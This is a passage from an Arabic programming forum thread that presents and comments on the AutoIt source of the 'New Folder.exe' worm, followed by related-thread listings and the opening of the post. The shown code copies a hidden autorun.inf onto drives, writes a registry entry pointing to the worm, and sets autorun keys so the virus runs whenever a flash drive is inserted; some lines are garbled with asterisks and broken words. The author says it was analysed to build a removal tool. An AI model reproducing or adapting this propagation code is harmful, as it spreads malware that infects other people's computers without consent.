FileCopy (@SystemDir & "\autorun.ini",$mang[$i] & "\autorun.inf",1)
FileSetAttrib ($mang[$i] & "\autorun.inf","+RSH")
Search($mang[$i])
EndIf
Next
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur rentVersion\Explorer\WorkgroupCrawler\Shares","sha red","REG_SZ",$mang[$i-1] & "\New Folder.exe")
EndFunc
; Create Autorun.inf (its now .ini but it will be renamed to .inf) which is copied to the flash memory to make the virus autorun whenever the flash is inserted
Func createini()
IniWrite (@SystemDir & "\autorun.ini","Autorun","Open",$name & $exe)
IniWrite (@SystemDir & "\autorun.ini","Autorun","****************lexe cute",$name & $exe)
IniWrite (@SystemDir & "\autorun.ini","Autorun","****************l\Open\c ommand",$name & $exe)
IniWrite (@SystemDir & "\autorun.ini","Autorun","****************l","Open ")
Sleep (1)
FileSetAttrib (@SystemDir & "\autorun.ini","+RSH")
EndFunc
　
; ----------------------------------------------------------------------------
;
; Well thats it

; Hope you will used it for good things like creating anti-new folder like i did

; If you have any questions dont hesitate to contact me on the forum
; New Folder.exe Code analyzed By Koudelka... Lebanese By Nature...Proud By Choice
;

المصدر: development-point - للمزيد تابع : الأرشيف

avp h;,h] AutoIt thdvs new folder>exelu hg;,] F D gtdvs

المواضيع المتشابهه للموضوع: شرح اكواد AutoIt فايرس new folder.exeمع شرح الكود
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
تحميل نسخة vb 3.8.7 منزوعة الكود	mahmodemos	قسم المواضيع المُكررة والمُخالفة	4	04-02-2013 10:21 PM
مكن هذا الكود ؟؟؟	‏windows 8	الأرشيف	0	11-12-2012 11:23 PM
تكفون سريال لبرنامج Folder Lock	‏windows 8	طلبات السيريالات و الكراكات لتفعيل البرامج	0	11-05-2012 05:51 PM
طلب تحويل الكود الى كود فيجول بيسيك	‏windows 8	الأرشيف	0	11-05-2012 03:02 PM
فايرس لمنع الموقع ..........	aaqassam	الأرشيف	0	10-30-2012 10:23 PM

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)

شرح اكواد AutoIt فايرس new folder.exeمع شرح الكود

بسم الله الرحمن الرحيم هوا كود فيرس شهير اسموNew Folder.exe اولا هحط الكود مع الشرح الخاص به $name = "SSVICHOSST"; اسم الفايروس $setting = "setting"; ملف